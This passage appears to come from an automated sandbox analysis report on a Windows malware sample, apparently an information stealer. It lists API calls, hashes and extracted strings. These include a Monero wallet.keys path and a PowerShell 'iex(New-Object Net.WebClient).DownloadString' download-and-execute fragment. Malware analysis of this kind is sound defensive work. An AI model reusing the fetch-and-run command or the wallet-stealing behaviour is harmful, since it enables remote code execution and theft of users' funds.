                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: a95fb54c4aedabf7b94bbca1a016ac276775aa73833a9f9a0d31e2bb718f42b5
                  • Instruction ID: 1718cb4b21d40032f8cd35ddd3dd10ff19ff9aa022e322dd0dfa9ef9b055ae2a
                  • Opcode Fuzzy Hash: a95fb54c4aedabf7b94bbca1a016ac276775aa73833a9f9a0d31e2bb718f42b5
                  • Instruction Fuzzy Hash: 4141D0B1C2010C9ADB18FFA0C892BFDF774AF10780F504139E60AA6195DFB46A5ACF91
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002E9F41
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 2f8864ae5c8331ccf4e6579f209f1e51b44cf5d3f3f9ae23cc965794ae1fa713
                  • Instruction ID: ca44c54d17fc168258f956ad8af5e312f7fdea43de0339411c5df19d38b02894
                  • Opcode Fuzzy Hash: 2f8864ae5c8331ccf4e6579f209f1e51b44cf5d3f3f9ae23cc965794ae1fa713
                  • Instruction Fuzzy Hash: A1615F70A6024CDBDB24EFA5CC96FEDB775AF40340F408128FA0A5B191EBB06A15CF52
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,0132E718,00000000,00020119,?), ref: 002F40F4
                  • RegQueryValueExA.ADVAPI32(?,0132ECD8,00000000,00000000,00000000,000000FF), ref: 002F4118
                  • RegCloseKey.ADVAPI32(?), ref: 002F4122
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4147
                  • lstrcat.KERNEL32(?,0132ED50), ref: 002F415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 3d793b349aecf1bf19d4a169e1ad34ff1c2f6d894bc2878bfe23fe8bf2888926
                  • Instruction ID: 8858099dbc45b305700818f02abb32e92e6a2bb7e8ff647e2b62a851db4f2527
                  • Opcode Fuzzy Hash: 3d793b349aecf1bf19d4a169e1ad34ff1c2f6d894bc2878bfe23fe8bf2888926
                  • Instruction Fuzzy Hash: 0341B6B6D102086BDB24EBA0DC46FFE733DAF98300F404968B71556181EA759B9D8FD2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0131B968,00000000,00020119,?), ref: 002F7E5E
                  • RegQueryValueExA.ADVAPI32(?,0132E798,00000000,00000000,000000FF,000000FF), ref: 002F7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 002F7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 02a1ff610646ed627ac098c575aa5f980db6114820a944f7508f3c8f3ab87c24
                  • Instruction ID: 118e3b19a34b0b67876e73d63b380c0895a862af4e9a1dbdb9d0fc183df1af49
                  • Opcode Fuzzy Hash: 02a1ff610646ed627ac098c575aa5f980db6114820a944f7508f3c8f3ab87c24
                  • Instruction Fuzzy Hash: 5A119EB1A54209EBD714CF94DD4AFBBFBB8FB09B10F10412AF705A7280D7B458059BA1
                  APIs
                  • StrStrA.SHLWAPI(0132E8D0,?,?,?,002F140C,?,0132E8D0,00000000), ref: 002F926C
                  • lstrcpyn.KERNEL32(0052AB88,0132E8D0,0132E8D0,?,002F140C,?,0132E8D0), ref: 002F9290
                  • lstrlen.KERNEL32(?,?,002F140C,?,0132E8D0), ref: 002F92A7
                  • wsprintfA.USER32 ref: 002F92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: e9a3fb31c798dc4fdddc9e0845e17902bed424ecc98a189684f73dbcd68cbec0
                  • Instruction ID: c400e37f1d6a7608990acb8ac2a6fbd043e095bcec7a037cb9ebc763796aec21
                  • Opcode Fuzzy Hash: e9a3fb31c798dc4fdddc9e0845e17902bed424ecc98a189684f73dbcd68cbec0
                  • Instruction Fuzzy Hash: CD011675500208FFCB04DFECD988EAE7BB9FF59390F148148F90A8B240C631AA51EB91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002E12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002E12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002E12F5
                  • RegCloseKey.ADVAPI32(?), ref: 002E12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 0fabd9a132a9fca96e080439c542363a6d23384472bceb615bb9605afb55c409
                  • Instruction ID: 86fd21f56cf6f5621acd70a0dec3eb463ea7caa53d22d48378d0bd5f148894ba
                  • Opcode Fuzzy Hash: 0fabd9a132a9fca96e080439c542363a6d23384472bceb615bb9605afb55c409
                  • Instruction Fuzzy Hash: D60131B9A40208BBDB14DFE0DC49FAEB7B8FF48701F008159FB0597280D6719A059F51
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: b21ec9e152263f412f050398221bd7a6452436c9669071e87d03a82cf6d31205
                  • Instruction ID: 1ba675930aa4473565bfc228e5a53f5fff498fc41f87ab128b378ac01597b2c5
                  • Opcode Fuzzy Hash: b21ec9e152263f412f050398221bd7a6452436c9669071e87d03a82cf6d31205
                  • Instruction Fuzzy Hash: C441E77111075C5EDB228B24CD94FFBFBED9F45784F2444F8EACA86182D2B19A548F20
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 002F6663
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F6726
                  • ExitProcess.KERNEL32 ref: 002F6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 4498cb81a87ec2f66ee8117dac76ac84cea6c0b7fe89aa5497bdecebeeac8ab6
                  • Instruction ID: 8e327186a4716a97df5ade5349232f6dc0095a32a8d7a3ed0e3455d39c52d939
                  • Opcode Fuzzy Hash: 4498cb81a87ec2f66ee8117dac76ac84cea6c0b7fe89aa5497bdecebeeac8ab6
                  • Instruction Fuzzy Hash: 03314DF1811208ABDB14EB50DC92FEEB778AF14340F4041A8F30A66191DFB46B59CF5A
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00300E28,00000000,?), ref: 002F882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F8836
                  • wsprintfA.USER32 ref: 002F8850
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 4791eeb406fb379cc70cda1ae93c45297315baec5292687da64559513b86bff6
                  • Instruction ID: 7971ee4ad42bb487d412d08757563088fbd13fedcef6d19de8bab0a0a4d33e40
                  • Opcode Fuzzy Hash: 4791eeb406fb379cc70cda1ae93c45297315baec5292687da64559513b86bff6
                  • Instruction Fuzzy Hash: 98214FB1E40208AFDB14DF94DD49FAEBBB8FF49701F104119F605A7280C779A905DBA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,002F951E,00000000), ref: 002F8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F8D62
                  • wsprintfW.USER32 ref: 002F8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: f0f3da9d7a3ba86a29d9eaf8a72f59868f1f5488ab562c2b3825b5e772d80b66
                  • Instruction ID: 8af2219e635ef5163c4116e1462c7c03bb647f673c8c68dcb5ae0c4ae5002348
                  • Opcode Fuzzy Hash: f0f3da9d7a3ba86a29d9eaf8a72f59868f1f5488ab562c2b3825b5e772d80b66
                  • Instruction Fuzzy Hash: CAE08CB1A40208BBE724DB94DC0AE6977B8EF06702F004094FE0997280DA719E05AB96
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002EA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 002EA3FF
                  • lstrlen.KERNEL32(00000000), ref: 002EA6BC
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 002EA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5c447a622320d0d947c307d204261b96bd969a6301f0e771c155c05a34d2c66f
                  • Instruction ID: cd42ac05c00dbbfff6009b6d7ac258a76b3793789e32d51bf6f75aff2fa58c30
                  • Opcode Fuzzy Hash: 5c447a622320d0d947c307d204261b96bd969a6301f0e771c155c05a34d2c66f
                  • Instruction Fuzzy Hash: 60E1B2B282010C9ADB15EBA4DD52DFEB338AF14780F508175F61B66091DE706A5DCF62
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ED481
                  • lstrlen.KERNEL32(00000000), ref: 002ED698
                  • lstrlen.KERNEL32(00000000), ref: 002ED6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 002ED72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: c8482f8eccf58c505eadbba1bc4c698fed6d079f2f100538a12e887e836dff36
                  • Instruction ID: 84889ef8523ffd6ede2df7ed1180529305ba0187d4caa44957b4adc30e8974ec
                  • Opcode Fuzzy Hash: c8482f8eccf58c505eadbba1bc4c698fed6d079f2f100538a12e887e836dff36
                  • Instruction Fuzzy Hash: 1691DFB18201089BDB14EBA4DD56DFEB338AF14780F508178F61B66091EF746A29CF62
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002F8B60: GetSystemTime.KERNEL32(00300E1A,01329C18,003005AE,?,?,002E13F9,?,0000001A,00300E1A,00000000,?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002F8B86
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ED801
                  • lstrlen.KERNEL32(00000000), ref: 002ED99F
                  • lstrlen.KERNEL32(00000000), ref: 002ED9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 002EDA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 0d9b4415bfcc4d885e54e1e2acf7bea123ea3edb0e2f43f18ac95e336ba59dbc
                  • Instruction ID: 13b322fa1c490fae095cf3b3d76940551c621c6766cbab31d339b35096d0d037
